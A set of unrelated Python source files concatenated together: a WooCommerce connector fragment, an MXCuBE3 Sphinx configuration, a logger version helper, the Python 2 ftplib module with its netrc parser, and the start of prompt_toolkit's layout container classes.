backend_id(self, record): return {'backend_id': self.backend_record.id} # @mapping def parent_id(self, record): if record['product_category']: rec = record['product_category'] if not rec['parent']: return binder = self.binder_for() category_id = binder.to_openerp(rec['parent'], unwrap=True) woo_cat_id = binder.to_openerp(rec['parent']) if category_id is None: raise MappingError("The product category with " "woo id %s is not imported." % rec['parent']) return {'parent_id': category_id, 'woo_parent_id': woo_cat_id} @job(default_channel='root.woo') def category_import_batch(session, model_name, backend_id, filters=None): """ Prepare the import of category modified on WooCommerce """ env = get_environment(session, model_name, backend_id) importer = env.get_connector_unit(CategoryBatchImporter) importer.run(filters=filters)
# -*- coding: utf-8 -*- # # MXCuBE3 documentation build configuration file, created by # sphinx-quickstart on Tue Nov 10 16:07:35 2015. # # This file is execfile()d with the current directory set to its # containing dir. # # Note that not all possible configuration values are present in this # autogenerated file. # # All configuration values have a default; values that are commented out # serve to show the default. import sys import os import shlex # If extensions (or modules to document with autodoc) are in another directory, # add these directories to sys.path here. If the directory is relative to the # documentation root, use os.path.abspath to make it absolute, like shown here. #sys.path.insert(0, os.path.abspath('.')) sys.path.append(os.path.abspath('../../')) sys.path.append(os.path.abspath('../../mxcube3/')) sys.path.append(os.path.abspath('../../mxcube3/HardwareObjects')) sys.path.append(os.path.abspath('../../mxcube3/HardwareRepository')) # -- General configuration ------------------------------------------------ # If your documentation needs a minimal Sphinx version, state it here. #needs_sphinx = '1.0' # Add any Sphinx extension module names here, as strings. They can be # extensions coming with Sphinx (named 'sphinx.ext.*') or your custom # ones. #extensions = ['sphinx.ext.autodoc', 'sphinx.ext.doctest', 'sphinx.ext.intersphinx', 'sphinx.ext.todo'] extensions = ['sphinxcontrib.httpdomain','sphinxcontrib.autohttp.flask', 'sphinx.ext.autodoc', 'sphinx.ext.doctest', 'sphinx.ext.intersphinx', 'sphinx.ext.todo'] # Add any paths that contain templates here, relative to this directory. templates_path = ['_templates'] # The suffix(es) of source filenames. # You can specify multiple suffix as a list of string: # source_suffix = ['.rst', '.md'] source_suffix = '.rst' # The encoding of source files. #source_encoding = 'utf-8-sig' # The master toctree document. master_doc = 'index' # General information about the project. project = u'MXCuBE3' copyright = u'2015, MXCuBE Collaboration' author = u'MXCuBE Collaboration' # The version info for the project you're documenting, acts as replacement for # |version| and |release|, also used in various other places throughout the # built documents. # # The short X.Y version. version = '0.1' # The full version, including alpha/beta/rc tags. release = '0.1' # The language for content autogenerated by Sphinx. Refer to documentation # for a list of supported languages. # # This is also used if you do content translation via gettext catalogs. # Usually you set "language" from the command line for these cases. language = None # There are two options for replacing |today|: either, you set today to some # non-false value, then it is used: #today = '' # Else, today_fmt is used as the format for a strftime call. #today_fmt = '%B %d, %Y' # List of patterns, relative to source directory, that match files and # directories to ignore when looking for source files. exclude_patterns = [] # The reST default role (used for this markup: `text`) to use for all # documents. #default_role = None # If true, '()' will be appended to :func: etc. cross-reference text. #add_function_parentheses = True # If true, the current module name will be prepended to all description # unit titles (such as .. function::). #add_module_names = True # If true, sectionauthor and moduleauthor directives will be shown in the # output. They are ignored by default. #show_authors = False # The name of the Pygments (syntax highlighting) style to use. 
pygments_style = 'sphinx' # A list of ignored prefixes for module index sorting. #modindex_common_prefix = [] # If true, keep warnings as "system message" paragraphs in the built documents. #keep_warnings = False # If true, `todo` and `todoList` produce output, else they produce nothing. todo_include_todos = False # -- Options for HTML output ---------------------------------------------- # The theme to use for HTML and HTML Help pages. See the documentation for # a list of builtin themes. html_theme = 'alabaster' # Theme options are theme-specific and customize the look and feel of a theme # further. For a list of options available for each theme, see the # documentation. #html_theme_options = {} # Add any paths that contain custom themes here, relative to this directory. #html_theme_path = [] # The name for this set of Sphinx documents. If None, it defaults to # "<project> v<release> documentation". #html_title = None # A shorter title for the navigation bar. Default is the same as html_title. #html_short_title = None # The name of an image file (relative to this directory) to place at the top # of the sidebar. #html_logo = None # The name of an image file (within the static path) to use as favicon of the # docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32 # pixels large. #html_favicon = None # Add any paths that contain custom static files (such as style sheets) here, # relative to this directory. They are copied after the builtin static files, # so a file named "default.css" will overwrite the builtin "default.css". html_static_path = ['_static'] # Add any extra paths that contain custom files (such as robots.txt or # .htaccess) here, relative to this directory. These files are copied # directly to the root of the documentation. #html_extra_path = [] # If not '', a 'Last updated on:' timestamp is inserted at every page bottom, # using the given strftime format. #html_last_updated_fmt = '%b %d, %Y' # If true, SmartyPants will be used to convert quotes and dashes to # typographically correct entities. #html_use_smartypants = True # Custom sidebar templates, maps document names to template names. #html_sidebars = {} # Additional templates that should be rendered to pages, maps page names to # template names. #html_additional_pages = {} # If false, no module index is generated. #html_domain_indices = True # If false, no index is generated. #html_use_index = True # If true, the index is split into individual pages for each letter. #html_split_index = False # If true, links to the reST sources are added to the pages. #html_show_sourcelink = True # If true, "Created using Sphinx" is shown in the HTML footer. Default is True. #html_show_sphinx = True # If true, "(C) Copyright ..." is shown in the HTML footer. Default is True. #html_show_copyright = True # If true, an OpenSearch description file will be output, and all pages will # contain a <link> tag referring to it. The value of this option must be the # base URL from which the finished HTML is served. #html_use_opensearch = '' # This is the file name suffix for HTML files (e.g. ".xhtml"). #html_file_suffix = None # Language to be used for generating the HTML full-text search index. # Sphinx supports the following languages: # 'da', 'de', 'en', 'es', 'fi', 'fr', 'hu', 'it', 'ja' # 'nl', 'no', 'pt', 'ro', 'ru', 'sv', 'tr' #html_search_language = 'en' # A dictionary with options for the search language support, empty by default. 
# Now only 'ja' uses this config value #html_search_options = {'type': 'default'} # The name of a javascript file (relative to the configuration directory) that # implements a search results scorer. If empty, the default will be used. #html_search_scorer = 'scorer.js' # Output file base name for HTML help builder. htmlhelp_basename = 'MXCuBE3doc' # -- Options for LaTeX output --------------------------------------------- latex_elements = { # The paper size ('letterpaper' or 'a4paper'). #'papersize': 'letterpaper', # The font size ('10pt', '11pt' or '12pt'). #'pointsize': '10pt', # Additional stuff for the LaTeX preamble. #'preamble': '', # Latex figure (float) alignment #'figure_align': 'htbp', } # Grouping the document tree into LaTeX files. List of tuples # (source start file, target name, title, # author, documentclass [howto, manual, or own class]). latex_documents = [ (master_doc, 'MXCuBE3.tex', u'MXCuBE3 Documentation', u'MXCuBE Collaboration', 'manual'), ] # The name of an image file (relative to this directory) to place at the top of # the title page. #latex_logo = None # For "manual" documents, if this is true, then toplevel headings are parts, # not chapters. #latex_use_parts = False # If true, show page references after internal links. #latex_show_pagerefs = False # If true, show URL addresses after external links. #latex_show_urls = False # Documents to append as an appendix to all manuals. #latex_appendices = [] # If false, no module index is generated. #latex_domain_indices = True # -- Options for manual page output --------------------------------------- # One entry per manual page. List of tuples # (source start file, name, description, authors, manual section). man_pages = [ (master_doc, 'mxcube3', u'MXCuBE3 Documentation', [author], 1) ] # If true, show URL addresses after external links. #man_show_urls = False # -- Options for Texinfo output ------------------------------------------- # Grouping the document tree into Texinfo files. List of tuples # (source start file, target name, title, author, # dir menu entry, description, category) texinfo_documents = [ (master_doc, 'MXCuBE3', u'MXCuBE3 Documentation', author, 'MXCuBE3', 'One line description of project.', 'Miscellaneous'), ] # Documents to append as an appendix to all manuals. #texinfo_appendices = [] # If false, no module index is generated. #texinfo_domain_indices = True # How to display URL addresses: 'footnote', 'no', or 'inline'. #texinfo_show_urls = 'footnote' # If true, do not generate a @detailmenu in the "Top" node's menu. #texinfo_no_detailmenu = False
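# --- hedged build note (not part of the Sphinx configuration above) ---
# With the extensions listed in `extensions` installed, the HTML docs are typically
# built from the directory containing this conf.py; the output path below is a
# common choice, not something this configuration mandates:
#
#   pip install sphinx sphinxcontrib-httpdomain
#   sphinx-build -b html . _build/html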
""" Current logger version. """ from subprocess import Popen, PIPE from os.path import abspath, dirname VERSION = (0, 2, 0, 'dev', 0) def git_sha(): loc = abspath(dirname(__file__)) try: p = Popen( "cd \"%s\" && git log -1 --format=format:%%h" % loc, shell=True, stdout=PIPE, stderr=PIPE ) return p.communicate()[0] except OSError: return None def get_version(form='short'): """ Returns the version string. Takes single argument ``form``, which should be one of the following strings: * ``short`` Returns major + minor branch version string with the format of B.b.t. * ``normal`` Returns human readable version string with the format of B.b.t _type type_num. * ``verbose`` Returns a verbose version string with the format of B.b.t _type type_num@git_sha * ``all`` Returns a dict of all versions. """ versions = {} branch = "%s.%s" % (VERSION[0], VERSION[1]) tertiary = VERSION[2] type_ = VERSION[3] type_num = VERSION[4] versions["branch"] = branch v = versions["branch"] if tertiary: versions["tertiary"] = "." + str(tertiary) v += versions["tertiary"] versions['short'] = v if form is "short": return v v += " " + type_ + " " + str(type_num) versions["normal"] = v if form is "normal": return v v += " @" + git_sha() versions["verbose"] = v if form is "verbose": return v if form is "all": return versions
"""An FTP client class and some helper functions. Based on RFC 959: File Transfer Protocol (FTP), by J. Postel and J. Reynolds Example: >>> from ftplib import FTP >>> ftp = FTP('ftp.python.org') # connect to host, default port >>> ftp.login() # default, i.e.: user anonymous, passwd anonymous@ '230 Guest login ok, access restrictions apply.' >>> ftp.retrlines('LIST') # list directory contents total 9 drwxr-xr-x 8 root wheel 1024 Jan 3 1994 . drwxr-xr-x 8 root wheel 1024 Jan 3 1994 .. drwxr-xr-x 2 root wheel 1024 Jan 3 1994 bin drwxr-xr-x 2 root wheel 1024 Jan 3 1994 etc d-wxrwxr-x 2 ftp wheel 1024 Sep 5 13:43 incoming drwxr-xr-x 2 root wheel 1024 Nov 17 1993 lib drwxr-xr-x 6 1094 wheel 1024 Sep 13 19:07 pub drwxr-xr-x 3 root wheel 1024 Jan 3 1994 usr -rw-r--r-- 1 root root 312 Aug 1 1994 welcome.msg '226 Transfer complete.' >>> ftp.quit() '221 Goodbye.' >>> A nice test that reveals some of the network dialogue would be: python ftplib.py -d localhost -l -p -l """ # # Changes and improvements suggested by Steve Majewski. # Modified by Jack to work on the mac. # Modified by Siebren to support docstrings and PASV. # Modified by Phil Schwartz to add storbinary and storlines callbacks. # import os import sys # Import SOCKS module if it exists, else standard socket module socket try: import SOCKS; socket = SOCKS; del SOCKS # import SOCKS as socket from socket import getfqdn; socket.getfqdn = getfqdn; del getfqdn except ImportError: import socket from socket import _GLOBAL_DEFAULT_TIMEOUT __all__ = ["FTP","Netrc"] # Magic number from <socket.h> MSG_OOB = 0x1 # Process data out of band # The standard FTP server control port FTP_PORT = 21 # Exception raised when an error or invalid response is received class Error(Exception): pass class error_reply(Error): pass # unexpected [123]xx reply class error_temp(Error): pass # 4xx errors class error_perm(Error): pass # 5xx errors class error_proto(Error): pass # response does not begin with [1-5] # All exceptions (hopefully) that may be raised here and that aren't # (always) programming errors on our side all_errors = (Error, IOError, EOFError) # Line terminators (we always output CRLF, but accept any of CRLF, CR, LF) CRLF = '\r\n' # The class itself class FTP: '''An FTP client class. To create a connection, call the class using these arguments: host, user, passwd, acct, timeout The first four arguments are all strings, and have default value ''. timeout must be numeric and defaults to None if not passed, meaning that no timeout will be set on any ftp socket(s) If a timeout is passed, then this is now the default timeout for all ftp socket operations for this instance. Then use self.connect() with optional host and port argument. To download a file, use ftp.retrlines('RETR ' + filename), or ftp.retrbinary() with slightly different arguments. To upload a file, use ftp.storlines() or ftp.storbinary(), which have an open file as argument (see their definitions below for details). The download/upload functions first issue appropriate TYPE and PORT or PASV commands. ''' debugging = 0 host = '' port = FTP_PORT sock = None file = None welcome = None passiveserver = 1 # Initialization method (called by class instantiation). 
# Initialize host to localhost, port to standard ftp port # Optional arguments are host (for connect()), # and user, passwd, acct (for login()) def __init__(self, host='', user='', passwd='', acct='', timeout=_GLOBAL_DEFAULT_TIMEOUT): self.timeout = timeout if host: self.connect(host) if user: self.login(user, passwd, acct) def connect(self, host='', port=0, timeout=-999): '''Connect to host. Arguments are: - host: hostname to connect to (string, default previous host) - port: port to connect to (integer, default previous port) ''' if host != '': self.host = host if port > 0: self.port = port if timeout != -999: self.timeout = timeout self.sock = socket.create_connection((self.host, self.port), self.timeout) self.af = self.sock.family self.file = self.sock.makefile('rb') self.welcome = self.getresp() return self.welcome def getwelcome(self): '''Get the welcome message from the server. (this is read and squirreled away by connect())''' if self.debugging: print '*welcome*', self.sanitize(self.welcome) return self.welcome def set_debuglevel(self, level): '''Set the debugging level. The required argument level means: 0: no debugging output (default) 1: print commands and responses but not body text etc. 2: also print raw lines read and sent before stripping CR/LF''' self.debugging = level debug = set_debuglevel def set_pasv(self, val): '''Use passive or active mode for data transfers. With a false argument, use the normal PORT mode, With a true argument, use the PASV command.''' self.passiveserver = val # Internal: "sanitize" a string for printing def sanitize(self, s): if s[:5] == 'pass ' or s[:5] == 'PASS ': i = len(s) while i > 5 and s[i-1] in '\r\n': i = i-1 s = s[:5] + '*'*(i-5) + s[i:] return repr(s) # Internal: send one line to the server, appending CRLF def putline(self, line): line = line + CRLF if self.debugging > 1: print '*put*', self.sanitize(line) self.sock.sendall(line) # Internal: send one command to the server (through putline()) def putcmd(self, line): if self.debugging: print '*cmd*', self.sanitize(line) self.putline(line) # Internal: return one line from the server, stripping CRLF. # Raise EOFError if the connection is closed def getline(self): line = self.file.readline() if self.debugging > 1: print '*get*', self.sanitize(line) if not line: raise EOFError if line[-2:] == CRLF: line = line[:-2] elif line[-1:] in CRLF: line = line[:-1] return line # Internal: get a response from the server, which may possibly # consist of multiple lines. Return a single string with no # trailing CRLF. If the response consists of multiple lines, # these are separated by '\n' characters in the string def getmultiline(self): line = self.getline() if line[3:4] == '-': code = line[:3] while 1: nextline = self.getline() line = line + ('\n' + nextline) if nextline[:3] == code and \ nextline[3:4] != '-': break return line # Internal: get a response from the server. # Raise various errors if the response indicates an error def getresp(self): resp = self.getmultiline() if self.debugging: print '*resp*', self.sanitize(resp) self.lastresp = resp[:3] c = resp[:1] if c in ('1', '2', '3'): return resp if c == '4': raise error_temp, resp if c == '5': raise error_perm, resp raise error_proto, resp def voidresp(self): """Expect a response beginning with '2'.""" resp = self.getresp() if resp[0] != '2': raise error_reply, resp return resp def abort(self): '''Abort a file transfer. Uses out-of-band data. 
This does not follow the procedure from the RFC to send Telnet IP and Synch; that doesn't seem to work with the servers I've tried. Instead, just send the ABOR command as OOB data.''' line = 'ABOR' + CRLF if self.debugging > 1: print '*put urgent*', self.sanitize(line) self.sock.sendall(line, MSG_OOB) resp = self.getmultiline() if resp[:3] not in ('426', '226'): raise error_proto, resp def sendcmd(self, cmd): '''Send a command and return the response.''' self.putcmd(cmd) return self.getresp() def voidcmd(self, cmd): """Send a command and expect a response beginning with '2'.""" self.putcmd(cmd) return self.voidresp() def sendport(self, host, port): '''Send a PORT command with the current host and the given port number. ''' hbytes = host.split('.') pbytes = [repr(port//256), repr(port%256)] bytes = hbytes + pbytes cmd = 'PORT ' + ','.join(bytes) return self.voidcmd(cmd) def sendeprt(self, host, port): '''Send a EPRT command with the current host and the given port number.''' af = 0 if self.af == socket.AF_INET: af = 1 if self.af == socket.AF_INET6: af = 2 if af == 0: raise error_proto, 'unsupported address family' fields = ['', repr(af), host, repr(port), ''] cmd = 'EPRT ' + '|'.join(fields) return self.voidcmd(cmd) def makeport(self): '''Create a new socket and send a PORT command for it.''' msg = "getaddrinfo returns an empty list" sock = None for res in socket.getaddrinfo(None, 0, self.af, socket.SOCK_STREAM, 0, socket.AI_PASSIVE): af, socktype, proto, canonname, sa = res try: sock = socket.socket(af, socktype, proto) sock.bind(sa) except socket.error, msg: if sock: sock.close() sock = None continue break if not sock: raise socket.error, msg sock.listen(1) port = sock.getsockname()[1] # Get proper port host = self.sock.getsockname()[0] # Get proper host if self.af == socket.AF_INET: resp = self.sendport(host, port) else: resp = self.sendeprt(host, port) return sock def makepasv(self): if self.af == socket.AF_INET: host, port = parse227(self.sendcmd('PASV')) else: host, port = parse229(self.sendcmd('EPSV'), self.sock.getpeername()) return host, port def ntransfercmd(self, cmd, rest=None): """Initiate a transfer over the data connection. If the transfer is active, send a port command and the transfer command, and accept the connection. If the server is passive, send a pasv command, connect to it, and start the transfer command. Either way, return the socket for the connection and the expected size of the transfer. The expected size may be None if it could not be determined. Optional `rest' argument can be a string that is sent as the argument to a REST command. This is essentially a server marker used to tell the server to skip over any data up to the given marker. """ size = None if self.passiveserver: host, port = self.makepasv() conn = socket.create_connection((host, port), self.timeout) if rest is not None: self.sendcmd("REST %s" % rest) resp = self.sendcmd(cmd) # Some servers apparently send a 200 reply to # a LIST or STOR command, before the 150 reply # (and way before the 226 reply). This seems to # be in violation of the protocol (which only allows # 1xx or error messages for LIST), so we just discard # this response. if resp[0] == '2': resp = self.getresp() if resp[0] != '1': raise error_reply, resp else: sock = self.makeport() if rest is not None: self.sendcmd("REST %s" % rest) resp = self.sendcmd(cmd) # See above. 
if resp[0] == '2': resp = self.getresp() if resp[0] != '1': raise error_reply, resp conn, sockaddr = sock.accept() if resp[:3] == '150': # this is conditional in case we received a 125 size = parse150(resp) return conn, size def transfercmd(self, cmd, rest=None): """Like ntransfercmd() but returns only the socket.""" return self.ntransfercmd(cmd, rest)[0] def login(self, user = '', passwd = '', acct = ''): '''Login, default anonymous.''' if not user: user = 'anonymous' if not passwd: passwd = '' if not acct: acct = '' if user == 'anonymous' and passwd in ('', '-'): # If there is no anonymous ftp password specified # then we'll just use anonymous@ # We don't send any other thing because: # - We want to remain anonymous # - We want to stop SPAM # - We don't want to let ftp sites to discriminate by the user, # host or country. passwd = passwd + 'anonymous@' resp = self.sendcmd('USER ' + user) if resp[0] == '3': resp = self.sendcmd('PASS ' + passwd) if resp[0] == '3': resp = self.sendcmd('ACCT ' + acct) if resp[0] != '2': raise error_reply, resp return resp def retrbinary(self, cmd, callback, blocksize=8192, rest=None): """Retrieve data in binary mode. A new port is created for you. Args: cmd: A RETR command. callback: A single parameter callable to be called on each block of data read. blocksize: The maximum number of bytes to read from the socket at one time. [default: 8192] rest: Passed to transfercmd(). [default: None] Returns: The response code. """ self.voidcmd('TYPE I') conn = self.transfercmd(cmd, rest) while 1: data = conn.recv(blocksize) if not data: break callback(data) conn.close() return self.voidresp() def retrlines(self, cmd, callback = None): """Retrieve data in line mode. A new port is created for you. Args: cmd: A RETR, LIST, NLST, or MLSD command. callback: An optional single parameter callable that is called for each line with the trailing CRLF stripped. [default: print_line()] Returns: The response code. """ if callback is None: callback = print_line resp = self.sendcmd('TYPE A') conn = self.transfercmd(cmd) fp = conn.makefile('rb') while 1: line = fp.readline() if self.debugging > 2: print '*retr*', repr(line) if not line: break if line[-2:] == CRLF: line = line[:-2] elif line[-1:] == '\n': line = line[:-1] callback(line) fp.close() conn.close() return self.voidresp() def storbinary(self, cmd, fp, blocksize=8192, callback=None): """Store a file in binary mode. A new port is created for you. Args: cmd: A STOR command. fp: A file-like object with a read(num_bytes) method. blocksize: The maximum data size to read from fp and send over the connection at once. [default: 8192] callback: An optional single parameter callable that is called on on each block of data after it is sent. [default: None] Returns: The response code. """ self.voidcmd('TYPE I') conn = self.transfercmd(cmd) while 1: buf = fp.read(blocksize) if not buf: break conn.sendall(buf) if callback: callback(buf) conn.close() return self.voidresp() def storlines(self, cmd, fp, callback=None): """Store a file in line mode. A new port is created for you. Args: cmd: A STOR command. fp: A file-like object with a readline() method. callback: An optional single parameter callable that is called on on each line after it is sent. [default: None] Returns: The response code. 
""" self.voidcmd('TYPE A') conn = self.transfercmd(cmd) while 1: buf = fp.readline() if not buf: break if buf[-2:] != CRLF: if buf[-1] in CRLF: buf = buf[:-1] buf = buf + CRLF conn.sendall(buf) if callback: callback(buf) conn.close() return self.voidresp() def acct(self, password): '''Send new account name.''' cmd = 'ACCT ' + password return self.voidcmd(cmd) def nlst(self, *args): '''Return a list of files in a given directory (default the current).''' cmd = 'NLST' for arg in args: cmd = cmd + (' ' + arg) files = [] self.retrlines(cmd, files.append) return files def dir(self, *args): '''List a directory in long form. By default list current directory to stdout. Optional last argument is callback function; all non-empty arguments before it are concatenated to the LIST command. (This *should* only be used for a pathname.)''' cmd = 'LIST' func = None if args[-1:] and type(args[-1]) != type(''): args, func = args[:-1], args[-1] for arg in args: if arg: cmd = cmd + (' ' + arg) self.retrlines(cmd, func) def rename(self, fromname, toname): '''Rename a file.''' resp = self.sendcmd('RNFR ' + fromname) if resp[0] != '3': raise error_reply, resp return self.voidcmd('RNTO ' + toname) def delete(self, filename): '''Delete a file.''' resp = self.sendcmd('DELE ' + filename) if resp[:3] in ('250', '200'): return resp elif resp[:1] == '5': raise error_perm, resp else: raise error_reply, resp def cwd(self, dirname): '''Change to a directory.''' if dirname == '..': try: return self.voidcmd('CDUP') except error_perm, msg: if msg.args[0][:3] != '500': raise elif dirname == '': dirname = '.' # does nothing, but could return error cmd = 'CWD ' + dirname return self.voidcmd(cmd) def size(self, filename): '''Retrieve the size of a file.''' # The SIZE command is defined in RFC-3659 resp = self.sendcmd('SIZE ' + filename) if resp[:3] == '213': s = resp[3:].strip() try: return int(s) except (OverflowError, ValueError): return long(s) def mkd(self, dirname): '''Make a directory, return its full pathname.''' resp = self.sendcmd('MKD ' + dirname) return parse257(resp) def rmd(self, dirname): '''Remove a directory.''' return self.voidcmd('RMD ' + dirname) def pwd(self): '''Return current working directory.''' resp = self.sendcmd('PWD') return parse257(resp) def quit(self): '''Quit, and close the connection.''' resp = self.voidcmd('QUIT') self.close() return resp def close(self): '''Close the connection without assuming anything about it.''' if self.file: self.file.close() self.sock.close() self.file = self.sock = None _150_re = None def parse150(resp): '''Parse the '150' response for a RETR request. Returns the expected transfer size or None; size is not guaranteed to be present in the 150 message. ''' if resp[:3] != '150': raise error_reply, resp global _150_re if _150_re is None: import re _150_re = re.compile("150 .* \((\d+) bytes\)", re.IGNORECASE) m = _150_re.match(resp) if not m: return None s = m.group(1) try: return int(s) except (OverflowError, ValueError): return long(s) _227_re = None def parse227(resp): '''Parse the '227' response for a PASV request. 
Raises error_proto if it does not contain '(h1,h2,h3,h4,p1,p2)' Return ('host.addr.as.numbers', port#) tuple.''' if resp[:3] != '227': raise error_reply, resp global _227_re if _227_re is None: import re _227_re = re.compile(r'(\d+),(\d+),(\d+),(\d+),(\d+),(\d+)') m = _227_re.search(resp) if not m: raise error_proto, resp numbers = m.groups() host = '.'.join(numbers[:4]) port = (int(numbers[4]) << 8) + int(numbers[5]) return host, port def parse229(resp, peer): '''Parse the '229' response for a EPSV request. Raises error_proto if it does not contain '(|||port|)' Return ('host.addr.as.numbers', port#) tuple.''' if resp[:3] != '229': raise error_reply, resp left = resp.find('(') if left < 0: raise error_proto, resp right = resp.find(')', left + 1) if right < 0: raise error_proto, resp # should contain '(|||port|)' if resp[left + 1] != resp[right - 1]: raise error_proto, resp parts = resp[left + 1:right].split(resp[left+1]) if len(parts) != 5: raise error_proto, resp host = peer[0] port = int(parts[3]) return host, port def parse257(resp): '''Parse the '257' response for a MKD or PWD request. This is a response to a MKD or PWD request: a directory name. Returns the directoryname in the 257 reply.''' if resp[:3] != '257': raise error_reply, resp if resp[3:5] != ' "': return '' # Not compliant to RFC 959, but UNIX ftpd does this dirname = '' i = 5 n = len(resp) while i < n: c = resp[i] i = i+1 if c == '"': if i >= n or resp[i] != '"': break i = i+1 dirname = dirname + c return dirname def print_line(line): '''Default retrlines callback to print a line.''' print line def ftpcp(source, sourcename, target, targetname = '', type = 'I'): '''Copy file from one FTP-instance to another.''' if not targetname: targetname = sourcename type = 'TYPE ' + type source.voidcmd(type) target.voidcmd(type) sourcehost, sourceport = parse227(source.sendcmd('PASV')) target.sendport(sourcehost, sourceport) # RFC 959: the user must "listen" [...] BEFORE sending the # transfer request. # So: STOR before RETR, because here the target is a "user". treply = target.sendcmd('STOR ' + targetname) if treply[:3] not in ('125', '150'): raise error_proto # RFC 959 sreply = source.sendcmd('RETR ' + sourcename) if sreply[:3] not in ('125', '150'): raise error_proto # RFC 959 source.voidresp() target.voidresp() class Netrc: """Class to parse & provide access to 'netrc' format files. See the netrc(4) man page for information on the file format. WARNING: This class is obsolete -- use module netrc instead. 
""" __defuser = None __defpasswd = None __defacct = None def __init__(self, filename=None): if filename is None: if "HOME" in os.environ: filename = os.path.join(os.environ["HOME"], ".netrc") else: raise IOError, \ "specify file to load or set $HOME" self.__hosts = {} self.__macros = {} fp = open(filename, "r") in_macro = 0 while 1: line = fp.readline() if not line: break if in_macro and line.strip(): macro_lines.append(line) continue elif in_macro: self.__macros[macro_name] = tuple(macro_lines) in_macro = 0 words = line.split() host = user = passwd = acct = None default = 0 i = 0 while i < len(words): w1 = words[i] if i+1 < len(words): w2 = words[i + 1] else: w2 = None if w1 == 'default': default = 1 elif w1 == 'machine' and w2: host = w2.lower() i = i + 1 elif w1 == 'login' and w2: user = w2 i = i + 1 elif w1 == 'password' and w2: passwd = w2 i = i + 1 elif w1 == 'account' and w2: acct = w2 i = i + 1 elif w1 == 'macdef' and w2: macro_name = w2 macro_lines = [] in_macro = 1 break i = i + 1 if default: self.__defuser = user or self.__defuser self.__defpasswd = passwd or self.__defpasswd self.__defacct = acct or self.__defacct if host: if host in self.__hosts: ouser, opasswd, oacct = \ self.__hosts[host] user = user or ouser passwd = passwd or opasswd acct = acct or oacct self.__hosts[host] = user, passwd, acct fp.close() def get_hosts(self): """Return a list of hosts mentioned in the .netrc file.""" return self.__hosts.keys() def get_account(self, host): """Returns login information for the named host. The return value is a triple containing userid, password, and the accounting field. """ host = host.lower() user = passwd = acct = None if host in self.__hosts: user, passwd, acct = self.__hosts[host] user = user or self.__defuser passwd = passwd or self.__defpasswd acct = acct or self.__defacct return user, passwd, acct def get_macros(self): """Return a list of all defined macro names.""" return self.__macros.keys() def get_macro(self, macro): """Return a sequence of lines which define a named macro.""" return self.__macros[macro] def test(): '''Test program. Usage: ftp [-d] [-r[file]] host [-l[dir]] [-d[dir]] [-p] [file] ... -d dir -l list -p password ''' if len(sys.argv) < 2: print test.__doc__ sys.exit(0) debugging = 0 rcfile = None while sys.argv[1] == '-d': debugging = debugging+1 del sys.argv[1] if sys.argv[1][:2] == '-r': # get name of alternate ~/.netrc file: rcfile = sys.argv[1][2:] del sys.argv[1] host = sys.argv[1] ftp = FTP(host) ftp.set_debuglevel(debugging) userid = passwd = acct = '' try: netrc = Netrc(rcfile) except IOError: if rcfile is not None: sys.stderr.write("Could not open account file" " -- using anonymous login.") else: try: userid, passwd, acct = netrc.get_account(host) except KeyError: # no account for host sys.stderr.write( "No account -- using anonymous login.") ftp.login(userid, passwd, acct) for file in sys.argv[2:]: if file[:2] == '-l': ftp.dir(file[2:]) elif file[:2] == '-d': cmd = 'CWD' if file[2:]: cmd = cmd + ' ' + file[2:] resp = ftp.sendcmd(cmd) elif file == '-p': ftp.set_pasv(not ftp.passiveserver) else: ftp.retrbinary('RETR ' + file, \ sys.stdout.write, 1024) ftp.quit() if __name__ == '__main__': test()
""" Container for the layout. (Containers can contain other containers or user interface controls.) """ from __future__ import unicode_literals from abc import ABCMeta, abstractmethod from six import with_metaclass from six.moves import range from .controls import UIControl, TokenListControl, UIContent from .dimension import LayoutDimension, sum_layout_dimensions, max_layout_dimensions from .margins import Margin from .screen import Point, WritePosition, _CHAR_CACHE from .utils import token_list_to_text, explode_tokens from prompt_toolkit.cache import SimpleCache from prompt_toolkit.filters import to_cli_filter, ViInsertMode, EmacsInsertMode from prompt_toolkit.mouse_events import MouseEvent, MouseEventType from prompt_toolkit.reactive import Integer from prompt_toolkit.token import Token from prompt_toolkit.utils import take_using_weights, get_cwidth __all__ = ( 'Container', 'HSplit', 'VSplit', 'FloatContainer', 'Float', 'Window', 'WindowRenderInfo', 'ConditionalContainer', 'ScrollOffsets', 'ColorColumn', ) Transparent = Token.Transparent class Container(with_metaclass(ABCMeta, object)): """ Base class for user interface layout. """ @abstractmethod def reset(self): """ Reset the state of this container and all the children. (E.g. reset scroll offsets, etc...) """ @abstractmethod def preferred_width(self, cli, max_available_width): """ Return a :class:`~prompt_toolkit.layout.dimension.LayoutDimension` that represents the desired width for this container. :param cli: :class:`~prompt_toolkit.interface.CommandLineInterface`. """ @abstractmethod def preferred_height(self, cli, width, max_available_height): """ Return a :class:`~prompt_toolkit.layout.dimension.LayoutDimension` that represents the desired height for this container. :param cli: :class:`~prompt_toolkit.interface.CommandLineInterface`. """ @abstractmethod def write_to_screen(self, cli, screen, mouse_handlers, write_position): """ Write the actual content to the screen. :param cli: :class:`~prompt_toolkit.interface.CommandLineInterface`. :param screen: :class:`~prompt_toolkit.layout.screen.Screen` :param mouse_handlers: :class:`~prompt_toolkit.layout.mouse_handlers.MouseHandlers`. """ @abstractmethod def walk(self, cli): """ Walk through all the layout nodes (and their children) and yield them. """ def _window_too_small(): " Create a `Window` that displays the 'Window too small' text. " return Window(TokenListControl.static( [(Token.WindowTooSmall, ' Window too small... ')])) class HSplit(Container): """ Several layouts, one stacked above/under the other. :param children: List of child :class:`.Container` objects. :param window_too_small: A :class:`.Container` object that is displayed if there is not enough space for all the children. By default, this is a "Window too small" message. :param get_dimensions: (`None` or a callable that takes a `CommandLineInterface` and returns a list of `LayoutDimension` instances.) By default the dimensions are taken from the children and divided by the available space. However, when `get_dimensions` is specified, this is taken instead. :param report_dimensions_callback: When rendering, this function is called with the `CommandLineInterface` and the list of used dimensions. (As a list of integers.) 
